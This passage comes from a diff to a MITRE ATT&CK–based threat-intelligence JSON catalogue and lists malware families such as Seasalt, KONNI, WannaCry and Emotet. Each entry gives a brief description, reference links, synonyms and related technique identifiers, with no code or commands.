"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "f25aab1a-0cef-4910-a85d-bb38b32ea41a", + "value": "Denis - S0354" + }, + { + "description": "[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)", + "meta": { + "external_id": "S0345", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0345", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" + ], + "synonyms": [ + "Seasalt" + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b45747dc-87ca-4597-a245-7e16a61bc491", + "value": "Seasalt - S0345" + }, + { + "description": "[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)", + "meta": { + "external_id": "S0346", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0346", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" + ], + "synonyms": [ + "OceanSalt" + ] + }, + "related": [ + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "288fa242-e894-4c7e-ac86-856deedf5cea", + "value": "OceanSalt - S0346" + }, + { + "description": "[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)", + "meta": { + "external_id": "S0347", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0347", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/" + ], + "synonyms": [ + "AuditCred", + "Roptimizer" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "24b4ce59-eaac-4c8b-8634-9b093b7ccd92", + "value": "AuditCred - S0347" + }, + { + "description": "[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)", + "meta": { + "external_id": "S0374", + "mitre_platforms": [ + "Linux", + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0374", + "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" + ], + "synonyms": [ + "SpeakUp" + ] + }, + "related": [ + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "a5575606-9b85-4e3d-9cd2-40ef30e3672d", + "value": "SpeakUp - S0374" + }, + { + "description": "[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "meta": { + "external_id": "S0356", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0356", + "https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ], + "synonyms": [ + "KONNI" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "86b92f6c-9c05-4c51-b361-4c7bb13e21a1", + "value": "KONNI - S0356" + }, + { + "description": "[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)", + "meta": { + "external_id": "S0375", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0375", + "https://securelist.com/chafer-used-remexi-malware/89538/" + ], + "synonyms": [ + "Remexi" + ] + }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "ecc2f65a-b452-4eaf-9689-7e181f17f7a5", + "value": "Remexi - S0375" + }, + { + "description": "[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)", + "meta": { + "external_id": "S0366", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0366", + "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/", + "https://www.us-cert.gov/ncas/alerts/TA17-132A", + "https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://www.secureworks.com/research/wcry-ransomware-analysis" + ], + "synonyms": [ + "WannaCry", + "WanaCry", + "WanaCrypt", + "WanaCrypt0r", + "WCry" + ] + }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "value": "WannaCry - S0366" + }, + { + "description": "[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)", + "meta": { + "external_id": "S0367", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0367", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/", + "https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/", + "https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/", + "https://support.malwarebytes.com/docs/DOC-2295", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader", + "https://blog.talosintelligence.com/2019/01/return-of-emotet.html", + "https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf", + "https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/", + "https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html", + "https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/" + ], + "synonyms": [ + "Emotet", + "Geodo" + ] + }, + "related": [ + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "32066e94-3112-48ca-b9eb-ba2b59d2f023", + "value": "Emotet - S0367" + }, + { + "description": "[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)", + "meta": { + "external_id": "S0376", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0376", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" + ], + "synonyms": [ + "HOPLIGHT" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + 